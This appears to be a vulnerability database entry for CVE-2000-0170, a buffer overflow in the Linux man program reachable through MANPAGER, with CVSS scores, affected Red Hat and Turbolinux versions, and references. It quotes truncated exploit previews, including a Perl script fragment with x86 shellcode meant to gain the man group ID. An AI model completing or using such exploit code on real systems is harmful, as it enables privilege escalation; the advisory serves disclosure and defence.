Published: 26/02/2000 Updated: 10/09/2008

CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9

VMScore: 735

Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Buffer overflow in the man program in Linux allows local users to gain privileges via the MANPAGER environmental variable.

Vulnerable Product	Search on Vulmon	Subscribe to Product
redhat linux 4.0
redhat linux 4.1
redhat linux 4.2
redhat linux 5.1
redhat linux 6.0
redhat linux 6.2
turbolinux turbolinux 3.5b2
turbolinux turbolinux 4.2
redhat linux 5.0
redhat linux 5.2
turbolinux turbolinux 4.4

/* source: wwwsecurityfocuscom/bid/1011/info RedHat 40/41/42/50/51/52/60/62,RedHat man 15,Turbolinux man 15,Turbolinux 35/42/44 man Buffer Overrun Vulnerability A buffer overflow exists in the implementation of the 'man' program shipped with RedHat Linux, and other LInux vendors By carefully crafting a long buffer of mach ...

/* source: wwwsecurityfocuscom/bid/1011/info RedHat 40/41/42/50/51/52/60/62,RedHat man 15,Turbolinux man 15,Turbolinux 35/42/44 man Buffer Overrun Vulnerability A buffer overflow exists in the implementation of the 'man' program shipped with RedHat Linux, and other LInux vendors By carefully crafting a long buffer of machin ...

#!/usr/bin/perl ## Redhat 61 man exploit - gives egid 15 ## Written just for fun - teleh0r@doglovercom $shellcode = "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07" "\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b" "\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff" "\xff\xff\x01\x2f\x62\x69\x6 ...

NVD-CWE-Other http://www.securityfocus.com/bid/1011 https://nvd.nist.gov https://www.exploit-db.com/exploits/19779/

CVE-2000-0170

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect